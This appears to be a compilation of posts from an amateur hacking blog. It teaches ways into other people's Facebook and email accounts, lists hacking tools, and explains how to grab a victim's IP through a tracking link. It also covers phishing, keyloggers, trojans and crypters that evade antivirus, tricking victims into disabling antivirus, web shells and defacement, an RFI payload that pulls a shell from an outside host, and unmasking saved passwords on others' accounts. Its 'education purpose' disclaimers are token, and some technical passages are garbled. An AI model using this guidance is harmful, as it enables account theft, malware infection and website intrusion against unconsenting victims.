Top 20 Different Ways To Hack Facebook Account

I don't know why, But about 100+ people ask me hack Facebook Account of any person. My Question to them, Why?? What is the reason...!!!  Public thinks that we have software and we add Email and Bingo...!!! 
I wish that it would be that simple but unfortunately, There is No Such thing like Facebook Hacking software. What you think that Companies like Facebook, Google and Twitter are sleeping ??? They spend million of $ to set security every year.

These are 20 very common ways to Hack Facebook accounts. You can also use same techniques to hack, Gmail, Yahoo, Hotmail, Twitter and all mailing account.

1. Social Engineering
2. Facebook Phishing
3. Keylogging
4. Password Stealers
5. Brute Force Attacks
6. Dictionary Attacks
7. Exploiting Facebook's Trusted Friend Feature
8. Fake SMS 
9. Session Hijacking
10. Sidejacking
11. Clickjacking
12. Mobile Phone Hacking
13. DNS Spoofing
14. USB Hacking
15. Man In the Middle Attacks
16. Botnets
17. By Pass Security Question
18. Cookies Grabbing
19. Using Facebook App's
20. Steal Victim Laptop/Cell Phone

There are few more ways to hack accounts but i think, its better to remain them private. 

Hackers Facts

80% Hackers receives request of Hacking Facebook Accounts from their Real Life Friends.

How to Protect yourself from Hackers ?

Install Firewall in your PC. I think Firewall is more Important then AV(Anti Virus). Windows firewall is shit, so don't trust on it. 
If you have some important Stuff on Facebook or Gmail then make new Email ID(Its free so Chill) and make yourself Admin of Pages and put mobile verification on it. And Turn ON all Security stuff which is available. Hide that Email ID from Public. And use 2nd one for Content Creating and other stuff.
At least in 2 month, Reset you Password for once.
Don't use same password at every place. 
Clean Cookies every month. 
Don't run exe files, which download my itself. 
There is NO such thing like 100% Security. So Chill. 

That's all for today. We will discuss one by one all topics mention above with Piratical. Every thing i teach is just for learning purpose.

Read More

Backtrack Basic Commands

Hi Guys,In this article am going to share with you some backtrack tips and tricks and commands that you must know while using your backtrack. I have divided it in some catagories that will be very easy to understand. Follow these commands and enjoye.

Know Your System

uname:    Print System Information

cal:      Displays Calculator

who:      Show Who Is Logged On

date:     Print System Date And Time

ps:       Displays Information Of Current Active Processes

df:       Report File System Disk Space Usage

du:       Estimate File Space Usage

clear:    Clear The Terminal Screen

cat /proc/:  cpuinfo Display CPU Information

cat /proc/meminfo:  Display Memory Information

kill:     Allows To Kills Process

File Operations

pwd:    Print Name Of Current/Working Directory

cp:     Copy Files Or Directory

cd:     Changing The Working Directory

rm:     Remove Files And Directory

ls:     List Of Directory Contents

cat:    Concatenate Files And Print On Standard Output

mkdir:  Make Directory

mv:     Move Files

chmod:  Change Files Permissions

Network

ifconfig  To Config Network Interface

ping      Check The Other System Are Reachable From The Host System

ssh       Remote Login Program

ftp       Download/Upload Files From/To Remote System

wget      Download Files From Network

last      Displays List Of Last Logged In User

telnet    Used To Communicate With Another Host Using THe Telnet Protocol

Compression

gzip:     Compress Or Decompress Named Files

tar:      To Store And Extract Files From An Archive File Known As Tar File

Searching Files

find      Search For Files In A Directory Hierarchy

grep      Search Files(s) For Specific Text

locate    Find Files By Name

Hope You Like It.Give Your Valuable Feedback At Comments Frequrntly If You are getting any problem in this post.

Read More

Network Hacking Tools

Hi friends! today am going to share with you the Network Hacking Tools for those who are interested in hacking and networking also.

Tools Descriptions Are:

1. Nmap

I think everyone has heard of this one, recently evolved into the 4.x series.

Nmap (Network Mapper) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application

name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.

Can be used by beginners (-sT) or by pros alike (packet_trace). A very versatile tool, once you fully understand the results.

Get Nmap By Click Here

2. Nessus Remote Security Scanner

Recently went closed source, but is still essentially free. Works with a client- server framework.

Nessus is the worlds most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the worlds largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.

Get Nessus By Click Here

3. John the Ripper

Yes, JTR 1.7 was recently released!

John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.

You can get JTR By Click Here

4. Nikto

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).

Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on http fingerprinting or Google hacking/info gathering etc, another article for just those).

Get Nikto By Click Here

5. SuperScan

Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.

If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice.

Get SuperScan By Click Here

6. P0f

P0f v3 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:

> Machines that connect to your box (SYN mode),

> Machines you connect to (SYN+ACK mode),

> Machine you cannot connect to (RST+ mode),

> Machines whose communications you can observe.

Basically it can fingerprint anything, just by listening, it doesn’t make ANY active connections to the target machine.

Get P0f By Click Here

7. Wireshark (Formely Ethereal)

Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers.

Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.

Get Wireshark By Click Here

8. Yersinia

Yersinia is a network tool designed to take advantage of some weakeness in different Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).

The best Layer 2 kit there is.

Get Yersinia By Click Here

9. Eraser

Eraser is an advanced security tool (for Windows), which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License.

An excellent tool for keeping your data really safe, if you’ve deleted it..make sure it’s really gone, you don’t want it hanging around to bite you in the ass.

Get Eraser By Click Here

10. PuTTY

PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must have for any h4. 0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients.

Get PuTTY By Click Here

11. LCP

Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute force session distribution, Hashes computing.

A good free alternative to L0phtcrack.

LCP was briefly mentioned in our well read Rainbow Tables and RainbowCrack article.

Get LCP By Click Here

12. Cain and Abel

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing

password boxes, uncovering cached passwords and analyzing routing protocols.

The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.

Get Cain and Abel Click Here

13. Kismet

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.

A good wireless tool as long as your card supports rfmon (look for an orinocco gold).

Get Kismet By Click Here

14. NetStumbler

Yes a decent wireless tool for Windows! Sadly not as powerful as it’s Linux counterparts, but it’s easy to use and has a nice interface, good for the basics of war-driving.

NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:

Verify that your network is set up the way you intended.

Find locations with poor coverage in your WLAN.

Detect other networks that may be causing interference on your network.

Detect unauthorized rogue access points in your workplace.

Help aim directional antennas for long-haul WLAN links.

Use it recreationally for WarDriving.

Get NetStumbler By Click Here

15. Hping

To finish off, something a little more advanced if you want to test your TCP/IP packet monkey skills.

Hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many

other features.

Get Hping By Click Here

These are some tools that are being used widely for Network Hacking! 

This is 2nd part of network hacking. You can see my 1st part also by click on below the link and also share and give your feedback about my this article.

Network Hacking Part 1

Read More

Top 10 HACKING Tools

Hello Friends!! Today I Am Going To Share With You About Top 10 HACKING Tools..

1: Nessus

In computer security, Nessus is a proprietary comprehensive vulnerability scanning program. It is free of charge for personal use in a non-enterprise environment. Its goal is to detect potential vulnerabilities on the tested systems. The “Nessus” Project aims to provide to the internet community a free, powerful, up-to-date and easy to use remote security scanner for Linux, BSD, Solaris, and other flavors of Unix.

2: Ethereal

Ethereal is a free network protocol analyzer for Unix and Windows. Ethereal has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session.

3: Snort

A free lightweight network intrusion detection system for UNIX and Windows. 

Snort is an open source network intrusion detection system, capable of performing real-time traffic analysis and packet logging on IP networks.

4: Netcat

Netcat is a computer networking service for reading from and writing network connections using TCP or UDP. 

Netcat has been dubbed the network swiss army knife. It is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol

5: Hping 

Hping is a command-line oriented TCP/IP packet assembler/analyzer, kind of like the “ping” program (but with a lot of extensions).

6: DNSiff

DNSiff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.).

7: GFI LANguard

GFI LANguard Network Security Scanner (N.S.S.) automatically scans your entire network, IP by IP, and plays the devil’s advocate alerting you to security vulnerabilities.

8: John the Ripper

John the Ripper is a fast password cracker, currently available for many flavors of Unix.

9: OpenSSH

OpenSSH (OpenBSD Secure Shell) is a set of computer programs providing encrypted communication sessions over a computer network using the ssh protocol. It was created as an open source alternative to the proprietary Secure Shell software suite offered by SSH Communications Security. 

OpenSSH is a FREE version of the SSH protocol suite of network connectivity tools, which encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other network-level attacks.

10: TripWire

Tripwire is a tool that can be used for data and program integrity assurance.

So how was this sharing? Please tell others and share this if you like this post..

Read More

Top 5 Themes Of Hackers For Win7

Hi guys! There are top 5 interesting themes for hacking lovers. Now you can download and enjoy these themes for only widow 7.

To install all themes below you must install Rainmeter on your computer otherwise these themes will not work for you. Rainmeter is a great software to customize your desktop as you want .
Download Rainmeter - Click here 

1. Bluevision alpha

It is one of the best rainmeter themes you will get a huge number of awesome widgets in this theme.

Download - Click here 

2. Jarvis (The iron man)

Jarvis is a Iron main inspired rainmeter skin, you can convert into hackers theme using new widgets and changing background image,Jarvis skin's central interface is damn cool.

Download - Click here

3. Tron legacy (inspired from the movie)

The interface is awesome effects are 3d and much more

Download - Click here 

4. Alien ware 3D desktop skin

Alien ware is an amazing skin, it will give a 3D Look to your desktop .

Download - Click here 

5. Blue HDD

Blue HDD is another hackers themes and have many objects.
Download - Click here

Note:

To install These themes you must first install Rainmeter skin on your pc otherwise these will not work.

Install Rainmeter and run on administrator !

Enjoy

Read More

Hacking Tips Before Start The HACKING

Hi guys! Today Am going to tell you some instruction before start the HACKING !

I am also learning hacking so that am going to share some tips for those who want to become a HACKER.

Follow these instruction:

1) Never trust sites that ask you for money in return of Hacking Software's or who claim to Hack Email Id’s in return of money. All such things are Scam . Nothing Works..!

2) There is NO DIRECT SOFTWARE to Hack Facebook , Google , Yahoo or any other big website. All the software's that claim to do so are scam. They are just meant to take your money and in worse cases, those software's have Trojans or keyloggers in them. As a result your account gets hacked trying to hack others.So please keep yourself away such cheap software.

3) NEVER ever use the keyloggers or Trojans you find as freeware on internet. Hackers are not fools. They compile keyloggers and Trojans almost with any such software and when you install them , you are already hacked before even trying to hack others.

4) You are never going to be a good hacker without the knowledge of programming and scripting languages. When you are going to use only ready made software's and would depend on them for hacking anything then your functionality would be limited up to the functionality of the software. When you are not going to use your brain , just doing the copy paste thing, then how can you even think of being a good hacker. hmm?

5) If you are a good Hacker, you already become a good programmer , a good script writer , a good web developer and an excellent security expert. Well any good Hacker will should have good knowledge of various aspects and programming languages. to do XSS (Cross Site Scripting ) , PHP INJECTION , SQL INJECTION , PHISHING , FOOT- PRINTING etc...

You will have to be good at programming and scripting. And when you know the Various loop holes , vulnerabilities and security tips, you already become a Computer Security Expert. So Never Ever Under estimate the term Hacker.

A Hacker Is Not a person who just hacks email id’s or servers but a True Hacker is a Computer Genius who the knowledge of computers more than anyone.

Such things will help you while learning hacking.Am also remember while doing some hacking tricks. Please give me your feedback if you like these information! 

Click below if you want to learn hacking!

Complete HACKING Information For Beginners

Read More

How To Get IP Address Of Any Computer

So you want to hack something but you don't know the victims IP then you are at the right place. ;)
Today I'm going to tell you how to get someone's IP without Letting them knowing that you have grabbed their IP. It is very simple trick and useful for hacking.
Only for education purpose!

You must have read in other blogs or fb posts about getting someone's ip but they shows the only way of getting victims IP is getting their PC on your control ie. You use their pc to get their IP.

But Now I am showing you a nice way to get victims IP there i m going to provide you all a link .

Step 1 . Go to the link provided Here - Link.

Step 2 . Then enter your Email address in which you want to receive the victims IP .

Step 3 . After entering your IP You will get 2 links:

Step 4. Then copy Both the links and send them to the victim If he clicks of any of both links his IP will be sent to your email which you provided above.

 When the victim clicks on the link he will get a error message like:

Congrats you have just grabbed your victims IP...!! :)

Read More

Complete HACKING Information For Beginners

Hi guys.. this is a hacking article for the beginners who are interested in hacking and want to start the hacking. So that am going to tell you about the complete hacking information in to the point.

Introduction:

We see a millions of people going to different forums and websites and asking “how do i hack an email?”, “Can you hack blah for me?”. So thought to create a tutorial which will give you the basic idea about what the heck is a “HACK”, and how to DEFEND YOUR SELF AGAINST HACKERS.

Background:

Hacking started way too far when the windows 98 was designed. Hacking is basically finding out the loop holes and trying leak some information out of it, which may lead you to get some critical information like passwords, credit card details. Sometimes hacking is done just because of the personal offesnses. And sometimes for enjoyment ;)

Things to remember

I will suggest you, KEEP READING ARTICLES AND TUTORIALS FROM GOOD SITES. THATS THE ONLY WAY YOU CAN LEARN. But only for education purpose :D

Initialization:

Getting back to the main point, I am going to discuss some of the ways of hacking in brief. Hacking is basically bifurcated in 2 major parts.

1. Email or the user information

2. Web based hacking.

Email or user information:

These days the most commonly used and famous way of hacking user information like Emails, Passwords, Credit card details are as follow:

a. Phishing

b. Brute Forcing

c. Keylogging

d. Trojans

A: Phishing:

What is Phishing?

Phishing is basically a massive attack. What a hacker does is, they created an absolutely look alike page of some website like yahoo or Gmail. They upload it to their own server. And give the link to any user. When they open it, they think that they are on the yahoo or gmail page, they put in their username and password, click on submit and your information has been submitted. This is widely used by new people trying to entering into a hacking world.

Disadvantages:

Still many people give it a try before going for phishing, because the only problem in phishing is, even if the victim knows a little about internet, he will read the URL and understand that it is not a genuine website.

B: Brute Forcing:

The question is same! What is brute forcing?  

Brute forcer is basically a program which could be called as a “cracker”. In brute forcer you put the username you want to hack, and as a password you put a notepad file which has almost all of the existing English words in it. So what it does is, it will try each and every word from that file and see if anything matches. You might have noticed some topics like “huge pass list” on different forums, they are nothing but the password list to put into your bruteforcer.!!

Disadvantages:

There are some disadvantages!!

1. Sometimes brute forcing may just go for ages!

2. It is not guaranteed.

3. These days many people have alpha-numeric-symbol password which is real tough for brutefocer to detect

4. Most of the famous sites like yahoo, gmail are designed in such a way that it will put the “image captcha” after 3 incorrect login attempts, which stops the bruteforcer. :(

C: Keylogging :

Keylogger helps you to create a little filed which is known as “server”. You gotta send your server to the victim. he has to click on it and then YOUR DONE! this is what happens.

Best possible way to hack someone. Keyloggers are basically a program which will install themselves in your victim’s computer and will keep on recording each and every keystroke pressed by the victim on his keyboard and it will send it to the hacker. There are many ways to receive the keystroke i.e. FTP, Email, Messengers. According to me this is the best way to trick your victim and get their information. It record data that is being typed and make a snap shots of programs.

Disadvantages :

There are some disadvantages!!

1. When victim receives the keylogger, in most of the cases, their anti virus would auto delete them. So you have to convince them to disable the anti virus by bluffing something.

2. Sometimes firewall blocks the keylogs from being sent.

Tip

There are some programs which are known as “crypters” which will help you to make your server’s undetectable. So your victim’s anti-virus would not be able to detect them.

D: Trojans :

Trojans are like father of keyloggers. :D Trojan sends you the keylogs just as keyloggers, on top of that, it lets you take the control of victim’s computer. Edit / delete/ upload / download files from or to their computer. Some more funny features like it will make their keyboard go mad, it may keep on ejecting and re-inserting the cd ROM. Much more.

Disadvantages :

Same as keyloggers.

Tips :

Same as keylogger.

Web Hacking:

I will discuss some most commonly used web hacking techniques which helps hackers to hack any website. This will alos help you to SAVE YOUR SITE!!!

1. SQL Injection

2. XSS

3. Shells

4. RFI

5. There are some more but they are too big to be discussed in here.

1 : SQL Injection :

Most of the websites these days are connected to an SQL Database. Which helps them to store usernames and passwords [encrypted] when a guest registers to their website. SQL database processes a queries every time a user logs in. It goes to the database, validates the password, if its correct then it logs in the user and if its not then it gives an error.

So the basic problem is executing a command to phrase a query in the database to try to exploit the internet information of the database. I cant really put the entire tutorial about because this is the most complicated way to hack the website! :(

P.S.:- If you wanna check if YOUR website is vulnerable to RFI attach or not then do the following .

If your site’s URL is:

Code:

yoursite.com/index.php?id=545

Just add a ‘ like this at the end

Code:

yoursite.com/index.php?id=545'

2 : XSS :

XSS is another nice way to hack some website. Suppose if some website/ forum is allowing HTML in the post or articles, then a hacker can post a malicious script into the content. So whenever a user opens up the page, the cookies would be sent to the hacker. So he can login as that user and f*ck the website up. :P

3. Shells :

Shell is a malicious .php script. What you have to do is, find a place in any website where you can upload any file like avatars, recepie, your tricks, your feed back. And you try to upload your shell files from there. And if its uploaded then you open it from the URL bar and u can see the entire “FTP” account of that web hosting. You can rename/edit / upload/download anything u want including the index page.

This is also known as deface.

4. RFI :

RFI is a good way to deface a website. It is used with shell. Suppose you have uploaded your shell on:

Code:

yoursite.com/shell.txt

And you found a vulnerable site to RFI then you can do as follow:

Code:

victimssite.com/index.php?page=yousite.com/shell.txt

This will again give u the access of your victim’s sites FTP , just as shell so you can f*ck up anything you want. :D

P.S.:- If you wanna check if YOUR website is vulnerable to RFI attach or not then do the following .

If your site’s URL is:

Code:

yoursite.com/index.php?id=545

Just add something like this at the end

Code:

yoursite.com/index.php?id=http://www.google.com

And if it includes the Google page into your page, that means its vulnerable to RFI.

DOne!!! 

I hope you will share this article.!!

ENJOY!

Read More

How To Get IP Adress Of Any Website

Hi guys, in this tutorial i will tell you hoe to get any website's ip address by easy and short method. In this method we use simple CMD commands to get IP address of any official website.

How to find IP:

1: Go to Starts > type cmd and press Enter.

2: Type ping followed by website URL whose IP you want to find.

3: It will take a little time and comes up with a result show below.

Done!!

Read More

Network Hacking

Hi guys, Am going to tell you about Network Hacking.There are some tips and tricks of network hacking that you don't know. This is part 1 of my article.

Only For Education Purpose :D

Ping

The IP address gives the attacker’s Internet address. The numerical address like 212.214.172.81 does not reveal much. You can use PING to convert the address into a domain name in WINDOWS: The Domain Name Service (DNS) protocol reveals the matching domain name. PING stands for “Packet Internet Groper” and is delivered with practically every

Internet compatible system, including all current Windows versions.

Make sure you are logged on to the net. Open the DOS shell and enter

the following PING command:

Ping –a 123.123.12.1

Ping will search the domain name and reveal it. You will often have information on the provider the attacker uses e.g.:

dialup21982.gateway123.provider.com

Pinging is normally the first step involved in hacking the target. Ping uses

ICMP (Internet Control Messaging Protocol) to determine whether the target host is reachable or not. Ping sends out ICMP Echo packets to the target host, if the target host is alive it would respond back with ICMP

Echo reply packets.

All the versions of Windows also contain the ping tool. To ping a remote host follow the procedure below.

Click Start and then click Run. Now type ping <ip address or hostname>

(For example: ping yahoo.com)

Ping Sweep

If you are undetermined about your target and just want a live system, ping sweep is the solution for you. Ping sweep also uses ICMP to scan for live systems in the specified range of IP addresses. Though Ping sweep is similar to ping but reduces the time involved in pinging a range of IP addresses. Nmap (http://www.insecure.org/) also contains an option

to perform ping sweeps.

Tracert

Tracert is another interesting tool available to find more interesting information about a remote host. Tracert also uses ICMP.

Tracert helps you to find out some information about the systems involved in sending data (packets) from source to destination. 

Go to DOS prompt and type tracert <destination address> 

(For example: tracert yahoo.com).

Port Scanning

After you have determined that your target system is alive the next important step would be to perform a port scan on the target system.

There are a wide range of port scanners available for free. But many of them uses outdated techniques for port scanning which could be easily recognized by the network administrator. Personally I like to use Nmap (http://www.insecure.org/) which has a wide range of options. You can download the NmapWin and its source code from:

http://www.sourceforge.net/projects/nmapwin.

Apart from port scanning Nmap is capable of identifying the Operating system being used, Version numbers of various services running,

firewalls being used and a lot more.

Common Ports

Below is a list of some common ports and the respective services

running on the ports.

20 FTP data (File Transfer Protocol)

21 FTP (File Transfer Protocol)

22 SSH

23 Telnet

25 SMTP (Simple Mail Transfer Protocol)

53 DNS (Domain Name Service)

68 DHCP (Dynamic host Configuration Protocol)

79 Finger

80 HTTP

110 POP3 (Post Office Protocol, version 3)

137 NetBIOS-ns

138 NetBIOS-dgm

139 NetBIOS

143 IMAP (Internet Message Access Protocol)

161 SNMP (Simple Network Management Protocol)

194 IRC (Internet Relay Chat)

220 IMAP3 (Internet Message Access Protocol 3)

389 LDAP

443 SSL (Secure Socket Layer)

445 SMB (NetBIOS over TCP)

Besides the above ports they are even some ports known as Trojan ports used by Trojans that allow remote access to that system.

Vulnerability Scanning

Every operating system or the services will have some vulnerabilities due to the  programming errors. These vulnerabilities are crucial for a successful hack. Bugtraq is an excellent mailing list discussing the vulnerabilities in the various system. 

Theexploit code writers write exploit codes to exploit these vulnerabilities existing in a system.

There are a number of vulnerability scanners available to scan the host for known vulnerabilities. These vulnerability scanners are very important for a network administrator to audit the network security.

Some of such vulnerability scanners include Shadow Security Scanner,Stealth HTTP Scanner, Nessus, etc. Visit

http://www.securityfocus.com/ vulnerabilities and exploit codes of various operating systems. Packet storm security

(http://www.packetstormsecurity.com/) is also a nice pick.

If you like my this information than please give me you feed back. I will write another article about network hacking tools as soon as possible.

You can see 2nd part to click on below link, are a Network Hacking Tools..

Network Hacking Tools

Read More

Top Ten Password Cracking Methods

Hi guys, In this article i will tell you how to crack a victim password through different top 10 methods. I hope you will enable to know all the method before you start to hack a password. 

Only for education purpose :D

1: Dictionary attack

"The dictonary attack uses a simple file containing words that can, surprise surprise, be found in a dictionary. In other words, if you will excuse the pun, this attack uses exactly the kind of words that many people use as their password...."

2:Brute force attack

"The brute force attack method is similar to the dictionary attack but with the added bonus, for the hacker, of being able to detect non-dictionary words by working through all possible alpha-numeric combinations from aaa1 to zzz10 known as brute force attack.."

3: Rainbow table attack

"A rainbow table is a list of pre-computed hashes - the numerical value of an encrypted password, used by most systems today and that’s the hashes of all possible password combinations for any given hashing algorithm mind. The time it takes to crack a password using a rainbow table is reduced to the time it takes to look it up in the list, Known as Rainbow table attack..."

4: Phishing

"There's an easy way to hack: ask the user for his/her password. A phishing email leads the unsuspecting reader to a faked online banking, payment or other site in order to login and put right some terrible problem with their security known as Phishing..."

5: Social Engineering

"A favorite of the social engineer is to telephone an office posing as an IT security tech guy and simply ask for the network access password. You’d be amazed how often this works, Known as Social Engineering..."

6: Malware

"A key logger or screen scraper can be installed by malware which records everything you type or takes screen shots during a login process, and then forwards a copy of this file to hacker central. It will save all the activities of your computer and save the all records, Known as Malware attack..."

7: Offline cracking

"Often the target in question has been compromised via an hack on a third party, which then provides access to the system servers and those all important user password hash files. The password cracker can then take as long as they need to try and crack the code without alerting the target system or individual user, Known as Offline cracking..."

8: Shoulder surfing

"The service personnel ‘uniform’ provides a kind of free pass to wander around unhindered, and make note of passwords being entered by genuine members of staff. It also provides an excellent opportunity to eyeball all those post-it notes stuck to the front of LCD screens with logins scribbled upon them, known as shoulder surfing..."

9: Spidering

"Savvy hackers have realized that many corporate passwords are made up of words that are connected to the business itself. Studying corporate literature, website sales material and even the websites of competitors and listed customers can provide the ammunition to build a custom word list to use in a brute force attack. this method is known as spidering..."

10: Guess

"The password crackers best friend, of course, is the predictability of the user. Unless a truly random password has been created using software dedicated to the task, a user generated ‘random’ password is unlikely to be anything of the sort. This is easy method to guess the victim password, that's why it is called on "guess""

I hope you have enough a knowledge to work out on these method for crack the password. In a nutshell, a hacker must know all possibilities before crack any password. ;)

Read More

Reveal The Password In Asterisk Form (****)

ASTERISK UNMASKING:
Hi guys, in this article am gonna tell you about how to reveal the password in asterisk form.

Now you can reveal the password from Asterisk form (****). This is usually happens when a user forgot to log out from a specific site and probably set their login preferences to ''Remember me''.. 

So we can easily log in to their account but we definitely would not see their password. This picture shows that what i want to say.

HOW TO REVEAL PASSWORD IN ASTERISK FORM:

1.In Google Chrome Browser:

Simply highlight or select the asterisk password and right-click on it, then scroll down and click on ''Inspect element'' as shown below in screenshot.

After this a pop up box will appear on at the bottom of your browser window. 

See the image below:

Now "double-click" where it is labelled ''password'' and change it to ''text'' as shown in the images below:

Screen Shot 1

Screen Shot 2

After changing it, Hit Enter!!!
You will be able to see the password in clear text.. :)

2. In Opera Browser

I also tried out the same trick opera browser (Opera Next ) and it works too..
It is Same method as that of Google chrome browser. Though there is a slight difference in the pop up window.
See the image below..

3.In Mozilla Firefox

As for the Firefox browser, it has got no built in ''Inspect Element'' :( . Therefore you will need two firefox extensions known as.

- DOM Inspector Download here 

- Inspect This  Download here 

Now Install both the above extensions into your firefox and restart your browser. 

Now go to the Asterisk password, highlight and right-click on it, then scroll down your options and click on ''Inspect Element'' :P

Clicking on "Inspect Element" will open the "DOM Inspector" window..

In the right pane of the DOM Inspector window, "double click" on where it says "Type" and "Password" as shown below.

An "Edit Attribute" pop up will open..

Now change the Node Value to from "password" to "text" and hit Enter!!!

Yahoooo.... ;) at this point, you will be able to see the password in clear and plain text..

Enjoy :)

Read More